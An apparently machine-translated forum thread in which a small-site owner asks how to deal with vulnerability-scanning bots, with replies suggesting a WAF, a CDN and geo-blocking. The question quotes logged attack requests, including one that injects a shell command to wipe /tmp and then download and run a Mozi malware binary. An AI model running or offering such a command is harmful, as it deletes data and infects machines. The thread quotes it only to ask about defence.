What to do with hacker http requests?

R

ramiil2021-09-10 11:35:59

linux

ramiil, 2021-09-10 11:35:59

I have a small site, and lately various http requests that are not related to the content of the site have begun to come to it, for example

get wp-login.php
get /gponform/diag_form?images/
get /shell?cd+/tmp;rm+-rf+*;wget+ 192.168.1.1:8088/mozi.a;chmod+777+mozi.a;/tmp/mozi ...

Obviously, these are attackers and their bots scanning the site in search of vulnerabilities. The question is what to do with them? I wrote a script that bans them from iptables, maybe there are sites that keep ban lists or signatures/regexps to detect malicious requests?

Reply

Answer the question

In order to leave comments, you need to log in

4 answer(s)

A

Alexander, 2021-09-10
@AleksandrB

To score, you can’t ban everyone, but if you want, you can ban real users.
Well, just do not leave such vulnerabilities.

M

Mnemonic0, 2021-09-10
@Mnemonic0

WAF - this will help you. Bans by ip / regions are like blocking / 8 networks when trying to block Telegram.
In short - you hide behind a CDN (Cloudfront for example) and set up AWS WAF verification in it - 95% of all hacking attempts will be closed.
The remaining 5% will be much more expensive to close, it all depends on the money that will be lost from the downtime of the site.

S

Satisfied IT, 2021-09-10
specialist @borisdenis

Decide on the target audience, if it is the Russian Federation, then we do not need access from other countries and we can safely ban the subnets of America, etc..
At least ban the subnets of China, from there the most inadequate requests are constantly coming.
You can also send known output nodes of the torus
to the ban list. Send to the ban list of the Amazon server and the like.
The volume of any garbage will be reduced significantly, the main thing is not to ban the right one)))